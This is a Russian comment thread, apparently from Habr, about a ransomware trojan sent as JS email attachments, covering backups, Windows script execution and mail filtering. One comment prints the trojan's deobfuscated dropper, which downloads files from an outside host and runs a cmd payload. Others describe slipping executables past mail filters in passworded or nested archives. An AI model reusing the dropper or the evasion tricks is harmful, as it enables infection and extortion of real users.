                                                                Вы не работали в очень-большой-корпорации. Представьте себе, что нет скайпа, дропбокса, яндекс диска и иже с ними — как правило у коллег или их вообще нет или они заблокированы на уровне прокси как «File sharing». А есть специальный сервер, и надо всегда вводить пароль, чтобы на него залогиниться, затем при выкладке файла надо нажать пару галок типа «да, я подтверждаю, что загружаемый файл не подпадает под Export Control» и т.д. Особо продвинутые могут через WebDAV к нему коннектиться, но всё равно сильно это время не экономит — за ссылкой всё равно в веб интерфейс надо идти. Я часть действий просто через AutoIt автоматизировал. Я к примеру, долгое время хабр вообще без картинок читал, так как habrastorage был напрочь заблокировани как storage, а чтобы почитать geektimes.ru мне и сейчас приходится каждый раз вводить специальную капчу, потому что это «Untrusted access — The site you are trying to access is not recognized as trusted Web site.» Вот так-то.
                                                        • 0
                                                          Они давно запретили передавать zip+zip, а одиночный zip не шифрует имена. Из способов обхода было переимонавание + шифрованный zip (иначе по magic определяет типы файлов). Шифрование имен файлов в архиве было у rar'а и, да, несколько спасало.
                                                          • 0
                                                            7z еще умеет шифровать имена файлов в архиве
                                                    • +4
                                                      Подскажите пожалуйста такую важную вещь.
                                                      Если комп словит такой вирус, то я так понимаю он зашифрует и файлы в облаке??? И они синхронизируются???

                                                      Я вдруг осознал всю бренность информационного бытия и как легко можно остаться без актуальных копий всех своих проектов и кучи другой полезной информации хранящейся в облаке…
                                                      • +2
                                                        Dropbox, к примеру, хранит предыдущие версии. Теоретически можно восстановить. А так — бэкапы.
                                                        • +1
                                                          Dropbox вообще молодцы. Я им в саппорт написал, они уже через час откатили транзакцию и все файлы (несколько сотен) восстановили.
                                                          • 0
                                                            У меня просто 250гиг халявных на Яндексе. А они, я так понимаю не бекапят. Во всяком случая я об этом не слышал.
                                                            Остается выход бекапить на другое облако, например mail.ru
                                                            Можно раз в неделю просто его запускать и он будет все новые файлы автоматически копировать. К сожалению ничего лучшего пока не придумал.
                                                          • +3
                                                            Да, поэтому нужно хранить не только текущие бекапы, но и бекапы давности 1 день, 2, 3, 5, месяц и т. д.
                                                            • 0
                                                              А я ещё использую «обратную инициацию бэкапа» — не клиент отправляет файлы в бэкап а бэкап-сервер собирает данные со всех машин в сети.
                                                              А сам бэкап-сервер жёстко зафаерволен и на нём отключены службы файлового доступа.
                                                              По двум причинам.
                                                              1 — параноя, что появится очередной msblast, и убъёт мой бэкап-сервер.
                                                              2 — даже с правами бэкап-пользователя вирус не дотянется до данных на бэкап-сервере.
                                                          • +4
                                                            При запуске троян загружает из Интернета и запускает дополнительные компоненты
                                                            Прошу прощения за возможно глупый вопрос, но каким образом в Windows запускается JS-файл? У меня, например, при даблклике запускается он открывается в текстовом редакторе
                                                            • +3
                                                              У вас изменены ассоциации. Блокнот на JS открывается при правом клике и нажатии «изменить». А при дабл клике система пытается его выполнить от прав пользователя.
                                                              • +1
                                                                Вон оно что оказывается! Спасибо. Я просто первым делом после установки Windows ставлю различные web-редакторы и ide, поэтому ассоциации js-файлов, естественно, меняюся. Думал что по умолчанию они ничем не открываются, либо блокнотом. Как говорится, век живи — век учись :)
                                                                • +1
                                                                  Так уже в винде js файлы исполняются как обычные скрипты? Круто. Их тогда можно вместо батников использовать?
                                                                  • +1
                                                                    И не только их, но еще и VBS. А если вспомнить про Encoded Script эти «батники» будут еще и от чтения/модификации защищены. Правда, не уверен что Encoded Script есть для JS.
                                                                    • +3
                                                                      Их именно для этого и сделали, еще в Windows 98 — почитайте про Active Scripting в википедии.
                                                                      • +1
                                                                        Уже лет 15 используем в системе билда и тестирования wsf. Там можно не только JS использовать, но и VB, COM вызовы и многие другие фишки. Можно даже вызывать из JS VB и наоборот.
                                                                        • 0
                                                                          Я обычно использую WSH скрипты. Тоже очень удобно.
                                                                          Но тому кому это не нужно, можно отключать ассоциации .js и .vbs, которые по умолчанию автоматически выполняются (по дабл клику) с помощью cscript.exe Чтобы случайно что-нибудь не того не напустить.
                                                                      • 0
                                                                        От греха поменял их специально, теперь по двойному клику открывается Sublime.
                                                                    • +1
                                                                      Как можно через javascript зашифровать файлы на компьютере?
                                                                      • +1
                                                                        Судя по деобфусцированному скрипту, он скачивает пару файлов. Один из них cmd скрипт. Далее js запускает этот cmd. Очевидно у js скрипа есть права на работу шелом.
                                                                        Скрипт
                                                                        var niagara="%TEMP%\\";
                                                                        var wallstreet="%TEMP%\\hotkey.cmd";
                                                                        var merce="www.andyblog.net";
                                                                        var sunbath="photo";
                                                                        var WshShell=WScript.CreateObject("WScript.Shell");
                                                                        var russi="%TEMP%\\word.doc";
                                                                        function http_download(warning,sunshi) {
                                                                        var objXMLHTTP=new ActiveXObject("MSXML2.XMLHTTP");
                                                                        objXMLHTTP.onreadystatechange=function() {
                                                                        if(objXMLHTTP.readyState===4) {
                                                                        var objADOStream=new ActiveXObject("ADODB.Stream");
                                                                        objADOStream.open();
                                                                        objADOStream.type=1;
                                                                        objADOStream.write(objXMLHTTP.ResponseBody);
                                                                        objADOStream.position=0;
                                                                        objADOStream.saveToFile(sunshi,2);
                                                                        objADOStream.close()
                                                                        }
                                                                        };
                                                                        objXMLHTTP.open("GET",warning,false);
                                                                        objXMLHTTP.send()
                                                                        }
                                                                        function CreateObject(ProgId) {
                                                                        return new ActiveXObject(ProgId)
                                                                        }
                                                                        var WshShell=CreateObject("WScript.Shell");
                                                                        niagara=WshShell.ExpandEnvironmentStrings(niagara);
                                                                        http_download('http://www.andyblog.net/photo/doc.keybtc','%TEMP%\\word.doc');
                                                                        
                                                                        try {
                                                                        WshShell.Run('%TEMP%\\word.doc',1,0)
                                                                        }
                                                                        
                                                                        catch(dcc) {};
                                                                        
                                                                        http_download('http://www.andyblog.net/photo/query.kbtc','%TEMP%\\query.kbtc');
                                                                        
                                                                        http_download('http://www.andyblog.net/photo/trsh.kbtc','%TEMP%\\trsh.kbtc');
                                                                        
                                                                        http_download('http://www.andyblog.net/photo/blck.keybtc','%TEMP%\\hotkey.cmd');
                                                                        
                                                                        WshShell.Run('%TEMP%\\hotkey.cmd',0,0);
                                                                        

                                                                        • +1
                                                                          А по чему нет? Такой скрипт должен сработать даже из под пользовательских прав. Такой скрипт не сможет добраться только до системных файлов. Но это и не надо. Достаточно будет зашифровать все пользовательские файлы. А если юзер админ, как бывает в подавляющем, то и все остальное сможет зашифровать.
                                                                          • +1
                                                                            Почему JS-скрипт может скачать cmd скрипт и запустить его? Почему нельзя запретить скриптам выполнять такие манипуляции?
                                                                            • 0
                                                                              Потому что существует множество ситуаций, когда эта функция и многие другие нужны в работе.
                                                                              • 0
                                                                                По крайней мере эти функции на мой взгляд, должны быть отключены для простых пользователей, а тем кому она может понадобится могут в конфигах браузера активировать на свой страх и риск.
                                                                                • 0
                                                                                  Это не функция браузера, это функция ОС.
                                                                                  Если отключить эти ассоциации, то нужно тогда отключать и COM, PIF, EXE, BAT, CMD так как они несут ту же угрозу.
                                                                          • 0
                                                                            Кстати, присоединяюсь к вопросу — этот javascript выполняется не в браузере? Как вообще получается, что JS (который, вроде как в браузере должен работать) получает доступ к ФС и запуску исполняемых файлов? Или это какая-то особенность почтовых клиентов на Windows?
                                                                            • +1
                                                                              Видимо в винде есть встроенный интерпретатор javascript (а ещё vbscript), и на них можно писать скрипты, типа как батники, только на javascript. В этом случае права как и у обычного экзешника.
                                                                              • +1
                                                                                Зовется wscript.exe если ничего не путаю…
                                                                                • 0
                                                                                  cscript консольный wscript — гуёвый
                                                                            • +5
                                                                              Уважаемый представитель Positive Technologies.
                                                                              Все были бы вам только благодарны, если бы вы передали эту информацию по своим каналам компании Microsoft.
                                                                              С предложением выпустить срочный патч, который запретит выполнение js файлов из аттачментов.
                                                                              На этом вы могли бы пропиариться куда сильнее, чем на совете «проверять файлы в песочнице» (которому никто не последует).
                                                                              • 0
                                                                                Винда следит за всеми процессами и определяет создание ими JS-файлов. Если этот процесс — архиватор (и не важно как винда будет их определять, особенно всякую экзотику), нужно определить что архив был в аттаче. Для этого придется следить за процессами любых почтовиков и браузеров и смотреть какие файлы из них кем обрабатываются. Знатно там в MS посмеются…
                                                                                • 0
                                                                                  В топике текст про js не в архиве.
                                                                                  • +1
                                                                                    Я ради люпобытства послал себе простенький безобидный js как в виде скрипта, так и в виде .doc.js.
                                                                                    На рабочую почту письмо вообще не дошло (ну там файрвол почище китайского)
                                                                                    На домашние пришло и я проверил как оно выглядит в Outlook 2010 «из коробки» и в TheBat! 6.6.
                                                                                    В Outlook файлы оказались заблокированы, что с одним расширением, что с двойным — их ни открыть, ни сохранить невозможно.
                                                                                    В TheBat файлы пришли, но при попытке открытия сначала предупреждается, что расширение двойное, и потом о том, что запуск прямо из почтовика невозможен. Если в топике текст про js не в архиве, то из аттачмента он и так не запустится (за все почтовики не скажу).
                                                                                    • 0
                                                                                      в архиве. Надо бы прикрутить к Exchange какую-нибудь проверялку — хотя бы на содержимое ZIP-ов
                                                                                      • 0
                                                                                        У нас письма с исполняемыми файлами (типа exe dll js) в архивах через почтовый сервер не проходят. Надо прилагать специальные усилия чтоб такие архивы пропихнуть (обфусцировать имена, паковать с паролем, вкладывать архив в архив и т.п.)
                                                                                        • 0
                                                                                          Forefront умеет проверять содержимое вложений — ZIP, RAR, CAB
                                                                                    • 0
                                                                                      Ну вот так топикстартер пишет… JS идет в ZIP-архиве.
                                                                                      • 0
                                                                                        Нет там такого текста.
                                                                                        Дайте цитату.
                                                                                        Там только в самом конце написано «в том числе в архивах.».
                                                                                        И все.
                                                                                        А на самом скрине явно видны js файлы в сыром виде, не в архивах:
                                                                                        habrastorage.org/getpro/habr/post_images/4c5/107/b5e/4c5107b5e5f5adfe0cf8b851c4d6b014.png
                                                                                        • 0
                                                                                          Ну вот я вам в третий раз уже говорю: рассылка производится в архивах. Специально нашел EML с трояном, проверил: точно в архиве. То что этого не написано в статье — косяк авторов.
                                                                                          • 0
                                                                                            Значит автор статьи ещё и вводит нас в заблуждение.
                                                                                            А этот пост — лишний способ попиариться.
                                                                                            • +2
                                                                                              Ну новые они в теме, чего поделать: 3 косяка в тексте уже нашлось.
                                                                                              • 0
                                                                                                Тонко :)
                                                                                                • 0
                                                                                                  Тонко — это пароль «1» на архив (про такой финт тоже не сказали в статье, а он есть).
                                                                                                  • 0
                                                                                                    Про это не сказали, потому что про архивы вообще не говорили.
                                                                                                    А так это очевидно — поставить пароль + шифрования имен файлов и все.
                                                                                                    • 0
                                                                                                      Да там практически ничего не сказали — они просто увидели в твиттере про это, погуглили и запилили статью. А сказать по зловреду этому можно очень-очень много. И про распространение, про разные версии, про используемые утилиты, про другой payload, используемый зловредом, методы самокриптовки, ситуацию с расшифровкой и т.д и т.п. Подсказывать больше не буду, постараюсь сам написать :)
                                                                                    • +1
                                                                                      «нужно определить что архив был в аттаче. „

                                                                                      Типа этого

                                                                                      morgansimonsen.wordpress.com/2007/02/22/zone-information-for-downloaded-files-and-ntfs-alternate-data-streams/
                                                                                      • 0
                                                                                        Что мешает использовать для маркировки файлов альтернативные потоки ntfs, например, как это сделано для загруженных из интернета файлов?
                                                                                        • 0
                                                                                          Слил файл wget'ом — запустился без вопросов. Из чего я делаю вывод, что маркируются файлы, сливаемые через определенные процессы. Далее см. выше про отслеживание всех почтовиков и всех архиваторов.
                                                                                          • 0
                                                                                            Действительно, метку в альтернативном потоке ставит создавшая файл программа, например, браузер.

                                                                                            Но почтовиков и архиваторов, как и браузеров не так уж и много, а популярных — так и того меньше. А разработчики архиваторов и прочего соответственно сами заинтересованы в том, чтобы «быть безопасными». Если мы говорим о предприятии (на которые нацелен вышеназванный вирус), то вероятно иметь домен и запрет на установку какого попало софта.

                                                                                            Нормальная логика для архиватора — на файл, который распакован их архива с меткой «пришёл по почте», поставить метки «распакован из архива» и «пришёл по почте». И опять же политика домена, которая запрещает запуск файлов с подобными метками. В таких условиях wget если и появится на компе, не будет запущен, т. к. будет содержать запрещающую метку.

                                                                                            Но нужна поддержка ОС для обработки этих меток. Именно за этим и предлагалось обратиться в майкрософт.

                                                                                            Я понимаю, что это не панацея и что вообще не бывает панацеи. Отмахиваться «да это не будет работать» — конечно проще, чем описать ситуации, где это всё-таки будет работать и поможет.
                                                                                            • 0
                                                                                              Предлагать очевидно неудачные решения тоже проще, чем удачные. И да, подумайте о бедных юзерах с FAT, которых сие прекрасное решение обойдет стороной по определению…
                                                                                        • +1
                                                                                          В OS X при первом выполнении приложения или скрипта система спрашивает, действительно ли нужно его открывать, указывая каким приложением он был скачан и на какой странице была ссылка на него. Даже если скрипт был извлечён из архива.
                                                                                          • –1
                                                                                            В огрызкосе есть достаточно серьезный косяк с обработкой ZIP-архивов: видны не те файлы, что будут извлечены. Правда, его багом не признали, но да что с них взять…
                                                                                            • 0
                                                                                              Можно подробнее, как воспроизвести баг?
                                                                                              • 0
                                                                                                Разработчики в курсе, а без фикса общественности знать не нужно…
                                                                                                • 0
                                                                                                  Я, скорее, к тому — как вообще в OS X посмотреть содержимое архива, не извлекая его? Насколько мне известно, стандартный Archiver.app умеет только извлекать, а смотреть внутрь архивов — нет. QuickLook-плагинов для просмотра содержимого архивов тоже нет в стандартной поставке, нужно ставить что-то типа BetterZIP. Keka тоже распаковывает без предварительного просмотра.

                                                                                                  Есть варианты с вызовом консольных архиваторов, но это врядли вектор атаки на обычного пользователя, т.к. я сильно сомневаюсь, что процедура «посмотреть содержимое архива в консоли, затем распаковать стандартным разархиватором» — это общепринятый воркфлоу.
                                                                                                  • 0
                                                                                                    Не совсем верно выразился: весь софт кроме того самого archiver.app увидит файл .good, а макось при распаковке вытащит файл bad.app и .good, причем .good юзер по умолчанию не увидит.
                                                                                                    • +1
                                                                                                      Окей, ждем фиксов и рассказа о технических тонкостях. Спасибо.
                                                                                                      • 0
                                                                                                        Не будет фикса: пару лет назад уведомили огрызочников, ответ — не баг. Хотя, может в тихую уже пофиксили, но мне негде потестить :-) В общем, они решили читать файлы не по стандарту, а как им проще ;-)
                                                                                                        Если продолжать тему архивов — винда тож не без греха, но не так критично: кеширует информацию о содержимом. Открываем средствами винды архив, закрываем. Меняем содержимое, открываем снова и видим старое.
                                                                                                        • 0
                                                                                                          Ну, тогда делайте proof of concept malware :) Может, в таком случае зашевелятся.
                                                                                                          • 0
                                                                                                            Нашел в рабочее время — не могу :-)
                                                                                                      • 0
                                                                                                        То есть, баг в том, что файлы, имена которых начинаются с точки, не видны пользователю? Если да, то это нормальное поведение в UNIX системах.
                                                                                                        • 0
                                                                                                          А что касается bad.app?
                                                                                                          • 0
                                                                                                            Которое в сочетании с появлением «левого» файла, которого ни один больше софт не видит крайне доставляет.
                                                                                                          • 0
                                                                                                            И, кстати, если это важно — в OS X, несмотря на то, что .app выглядят, как файлы — это на самом деле директории со специфичной структурой внутри.
                                                                                              • 0
                                                                                                Надо пользователям, которые не умеют отличать js от когда запретить выполнять оттуда куда он может писать.
                                                                                            • 0
                                                                                              На мой взгляд эффективный способ борьбы с распространением вируса — абуза почтовому сервису. Но если почта на собственном домене это может и не сработать.
                                                                                              • 0
                                                                                                Там однократная рассылка от имени предыдущей жертвы. Абуза только усложит и без того не простую ситуацию пострадавшего (не только файлы расшифровывать надо, но и доказывать почтовой службе, что не распространяешь вирусы).
                                                                                                • 0
                                                                                                  Я имел ввиду абузу на почтовый ящик «хакира», куда он предлагает слать инфу для разблокировки.
                                                                                                  Но есть, конечно, проблема — если почтовый ящик «хакира» заблочат, то как в таком случае жертве связаться с ним, чтобы расшифровать файлы.
                                                                                                  • +1
                                                                                                    Жертве — не надо ничего расшифровывать. Надо распаковать из бекапа. Ах, нет бекапа? Ну, с этого момента он будет. В школе почему-то всякой ерунде учат, а про то, что бекапы в век информационных технологий — первостепенной важности вещь — нет.
                                                                                              • +1
                                                                                                Создал простой js-файл с возможностью работы с ФС, дал двойное расширение. Пытаюсь отправить себе на почту — а файла нету. COMODO CIS в карантин убрал с пометкой Heur.DualExtensions
                                                                                                • 0
                                                                                                  Каким образом рекламный баннер в ролике на Youtube может заразить компьютер?
                                                                                                  Посмотрел ролик и получил заразу?
                                                                                                  Или, чтобы заразиться, надо все-таки щелкнуть по баннеру и в открывшемся новом окне что-то скачать/запустить?
                                                                                                  • 0
                                                                                                    там баннеры поверх видео могут быть
                                                                                                    • +1
                                                                                                      Выполнение кода в SWF
                                                                                                      • 0
                                                                                                        Ну тогда ютуб и есть рассадник, раз позволяет произвольный под рекламодателю выполнять.
                                                                                                    • +3
                                                                                                      Было несколько попыток подсунуть этот вирь еще несколько недель назад. Причем изучили сайт компании и сделали письмо руками под специфику.

                                                                                                      Вот здесь создатели делятся своими переживаниями.

                                                                                                      apps.plushev.com/2014/08/14/2829/

                                                                                                      Это типа не они плохие, а жизнь такая. Политики делают миллионы на крови, а простым робингудам совесть не позволяет, приходится заниматься вымогательством.

                                                                                                      • +1
                                                                                                        Власти там и сям запрещают использование криптографии (свыше определенного уровня стойкости), якобы заботясь о нашей же с вами безопасности. А этим жуликам никто не запретил использовать RSA-1024.

                                                                                                        Власти пытаются запретить криптовалюты. Выходит, что, столкнувшись с таким трояном-шифровальщиком, гражданин будет вынужден нарушить закон и купить эту криптовалюту, чтобы расплатиться с вымогателями.

                                                                                                        Печальный парадокс. Как обычно и бывает, от заботы властей о нашей безопасности, эта самая безопасность лишь снижается. Не буду говорить про все сферы, но в информационном и IT пространстве — это именно так.